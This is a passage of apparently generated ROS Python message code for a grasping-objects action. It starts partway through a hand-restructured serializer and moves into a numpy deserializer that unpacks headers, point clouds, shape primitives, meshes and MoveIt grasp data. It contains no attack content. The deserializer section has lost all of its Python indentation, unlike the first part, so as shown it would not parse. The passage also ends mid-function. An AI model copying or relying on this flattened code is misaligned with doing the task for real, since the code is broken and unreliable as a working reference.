        write(_pI.pack(len(obj.mesh_poses)))
        for pose in obj.mesh_poses:
            w_pose(pose)
        # shape_msgs/Plane coef: fixed float64[4], no length prefix
        write(obj.surface.coef.tobytes())

    def w_trajectory(jt):
        # trajectory_msgs/JointTrajectory.
        w_header(jt.header)
        write(_pI.pack(len(jt.joint_names)))
        for name in jt.joint_names:
            w_string(name)
        write(_pI.pack(len(jt.points)))
        for pt in jt.points:
            w_float64_array(pt.positions)
            w_float64_array(pt.velocities)
            w_float64_array(pt.accelerations)
            w_float64_array(pt.effort)
            # genpy Duration: signed secs/nsecs
            write(_p2i.pack(pt.time_from_start.secs, pt.time_from_start.nsecs))

    def w_translation(gt):
        # moveit_msgs/GripperTranslation: stamped vector + two distances.
        w_header(gt.direction.header)
        vec = gt.direction.vector
        write(_p3d.pack(vec.x, vec.y, vec.z))
        write(_p2f.pack(gt.desired_distance, gt.min_distance))

    def w_grasp(g):
        # moveit_msgs/Grasp.
        w_string(g.id)
        w_trajectory(g.pre_grasp_posture)
        w_trajectory(g.grasp_posture)
        w_header(g.grasp_pose.header)
        w_pose(g.grasp_pose.pose)
        write(_pd.pack(g.grasp_quality))
        w_translation(g.pre_grasp_approach)
        w_translation(g.post_grasp_retreat)
        w_translation(g.post_place_retreat)
        write(_pf.pack(g.max_contact_force))
        write(_pI.pack(len(g.allowed_touch_objects)))
        for name in g.allowed_touch_objects:
            w_string(name)

    def w_graspable(go):
        # grasping_msgs/GraspableObject: the object plus its grasps.
        w_object(go.object)
        write(_pI.pack(len(go.grasps)))
        for g in go.grasps:
            w_grasp(g)

    try:
        # --- action_goal -------------------------------------------------
        w_header(self.action_goal.header)
        gid = self.action_goal.goal_id
        write(_p2I.pack(gid.stamp.secs, gid.stamp.nsecs))
        w_string(gid.id)
        # The generated code packed this bool together with the result
        # header as '<B3I'; '<' formats have no padding, so writing the
        # pieces separately yields identical bytes.
        write(_pB.pack(self.action_goal.goal.plan_grasps))
        # --- action_result -----------------------------------------------
        w_header(self.action_result.header)
        status = self.action_result.status
        write(_p2I.pack(status.goal_id.stamp.secs, status.goal_id.stamp.nsecs))
        w_string(status.goal_id.id)
        write(_pB.pack(status.status))
        w_string(status.text)
        result = self.action_result.result
        write(_pI.pack(len(result.objects)))
        for go in result.objects:
            w_graspable(go)
        write(_pI.pack(len(result.support_surfaces)))
        for obj in result.support_surfaces:
            w_object(obj)
        # --- action_feedback ---------------------------------------------
        w_header(self.action_feedback.header)
        status = self.action_feedback.status
        write(_p2I.pack(status.goal_id.stamp.secs, status.goal_id.stamp.nsecs))
        w_string(status.goal_id.id)
        write(_pB.pack(status.status))
        w_string(status.text)
        w_graspable(self.action_feedback.feedback.object)
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.action_goal is None:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
if self.action_result is None:
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
end = 0
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.goal_id.id = str[start:end]
_x = self
start = end
end += 13
(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_B3I().unpack(str[start:end])
self.action_goal.goal.plan_grasps = bool(self.action_goal.goal.plan_grasps)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.text = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.objects = []
for i in range(0, length):
val1 = grasping_msgs.msg.GraspableObject()
_v250 = val1.object
_v251 = _v250.header
start = end
end += 4
(_v251.seq,) = _get_struct_I().unpack(str[start:end])
_v252 = _v251.stamp
_x = _v252
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v251.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v251.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v250.name = str[start:end].decode('utf-8', 'rosmsg')
else:
_v250.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v250.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
_v250.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.properties = []
for i in range(0, length):
val3 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.value = str[start:end]
_v250.properties.append(val3)
_v253 = _v250.point_cluster
_v254 = _v253.header
start = end
end += 4
(_v254.seq,) = _get_struct_I().unpack(str[start:end])
_v255 = _v254.stamp
_x = _v255
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v254.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v254.frame_id = str[start:end]
_x = _v253
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v253.fields = []
for i in range(0, length):
val4 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val4.name = str[start:end]
_x = val4
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v253.fields.append(val4)
_x = _v253
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v253.is_bigendian = bool(_v253.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v253.data = str[start:end]
start = end
end += 1
(_v253.is_dense,) = _get_struct_B().unpack(str[start:end])
_v253.is_dense = bool(_v253.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.primitives = []
for i in range(0, length):
val3 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val3.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v250.primitives.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.primitive_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v256 = val3.position
_x = _v256
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v257 = val3.orientation
_x = _v257
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v250.primitive_poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.meshes = []
for i in range(0, length):
val3 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.triangles = []
for i in range(0, length):
val4 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val3.triangles.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val3.vertices.append(val4)
_v250.meshes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v250.mesh_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v258 = val3.position
_x = _v258
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v259 = val3.orientation
_x = _v259
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v250.mesh_poses.append(val3)
_v260 = _v250.surface
start = end
end += 32
_v260.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.grasps = []
for i in range(0, length):
val2 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
_v261 = val2.pre_grasp_posture
_v262 = _v261.header
start = end
end += 4
(_v262.seq,) = _get_struct_I().unpack(str[start:end])
_v263 = _v262.stamp
_x = _v263
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v262.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v262.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v261.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v261.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v261.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v264 = val4.time_from_start
_x = _v264
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v261.points.append(val4)
_v265 = val2.grasp_posture
_v266 = _v265.header
start = end
end += 4
(_v266.seq,) = _get_struct_I().unpack(str[start:end])
_v267 = _v266.stamp
_x = _v267
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v266.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v266.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v265.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v265.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v265.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v268 = val4.time_from_start
_x = _v268
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v265.points.append(val4)
_v269 = val2.grasp_pose
_v270 = _v269.header
start = end
end += 4
(_v270.seq,) = _get_struct_I().unpack(str[start:end])
_v271 = _v270.stamp
_x = _v271
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v270.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v270.frame_id = str[start:end]
_v272 = _v269.pose
_v273 = _v272.position
_x = _v273
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v274 = _v272.orientation
_x = _v274
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val2.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v275 = val2.pre_grasp_approach
_v276 = _v275.direction
_v277 = _v276.header
start = end
end += 4
(_v277.seq,) = _get_struct_I().unpack(str[start:end])
_v278 = _v277.stamp
_x = _v278
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v277.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v277.frame_id = str[start:end]
_v279 = _v276.vector
_x = _v279
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v275
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v280 = val2.post_grasp_retreat
_v281 = _v280.direction
_v282 = _v281.header
start = end
end += 4
(_v282.seq,) = _get_struct_I().unpack(str[start:end])
_v283 = _v282.stamp
_x = _v283
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v282.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v282.frame_id = str[start:end]
_v284 = _v281.vector
_x = _v284
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v280
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v285 = val2.post_place_retreat
_v286 = _v285.direction
_v287 = _v286.header
start = end
end += 4
(_v287.seq,) = _get_struct_I().unpack(str[start:end])
_v288 = _v287.stamp
_x = _v288
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v287.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v287.frame_id = str[start:end]
_v289 = _v286.vector
_x = _v289
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v285
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val2.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
val2.allowed_touch_objects.append(val3)
val1.grasps.append(val2)
self.action_result.result.objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.support_surfaces = []
for i in range(0, length):
val1 = grasping_msgs.msg.Object()
_v290 = val1.header
start = end
end += 4
(_v290.seq,) = _get_struct_I().unpack(str[start:end])
_v291 = _v290.stamp
_x = _v291
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v290.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v290.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.properties = []
for i in range(0, length):
val2 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.value = str[start:end]
val1.properties.append(val2)
_v292 = val1.point_cluster
_v293 = _v292.header
start = end
end += 4
(_v293.seq,) = _get_struct_I().unpack(str[start:end])
_v294 = _v293.stamp
_x = _v294
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v293.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v293.frame_id = str[start:end]
_x = _v292
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v292.fields = []
for i in range(0, length):
val3 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
_x = val3
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v292.fields.append(val3)
_x = _v292
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v292.is_bigendian = bool(_v292.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v292.data = str[start:end]
start = end
end += 1
(_v292.is_dense,) = _get_struct_B().unpack(str[start:end])
_v292.is_dense = bool(_v292.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitives = []
for i in range(0, length):
val2 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val2.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
val1.primitives.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitive_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v295 = val2.position
_x = _v295
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v296 = val2.orientation
_x = _v296
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.primitive_poses.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.meshes = []
for i in range(0, length):
val2 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.triangles = []
for i in range(0, length):
val3 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val3.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val2.triangles.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val2.vertices.append(val3)
val1.meshes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.mesh_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v297 = val2.position
_x = _v297
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v298 = val2.orientation
_x = _v298
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.mesh_poses.append(val2)
_v299 = val1.surface
start = end
end += 32
_v299.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
self.action_result.result.support_surfaces.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.text = str[start:end]
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.name = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.properties = []
for i in range(0, length):
val1 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.value = str[start:end]
self.action_feedback.feedback.object.object.properties.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields = []
for i in range(0, length):
val1 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
_x = val1
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields.append(val1)
_x = self
start = end
end += 9
(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step,) = _get_struct_B2I().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_bigendian = bool(self.action_feedback.feedback.object.object.point_cluster.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_feedback.feedback.object.object.point_cluster.data = str[start:end]
start = end
end += 1
(self.action_feedback.feedback.object.object.point_cluster.is_dense,) = _get_struct_B().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_dense = bool(self.action_feedback.feedback.object.object.point_cluster.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives = []
for i in range(0, length):
val1 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val1.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val1.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
self.action_feedback.feedback.object.object.primitives.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v300 = val1.position
_x = _v300
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v301 = val1.orientation
_x = _v301
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.meshes = []
for i in range(0, length):
val1 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.triangles = []
for i in range(0, length):
val2 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val2.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val1.triangles.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.vertices = []
for i in range(0, length):
val2 = geometry_msgs.msg.Point()
_x = val2
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val1.vertices.append(val2)
self.action_feedback.feedback.object.object.meshes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v302 = val1.position
_x = _v302
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v303 = val1.orientation
_x = _v303
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses.append(val1)
start = end
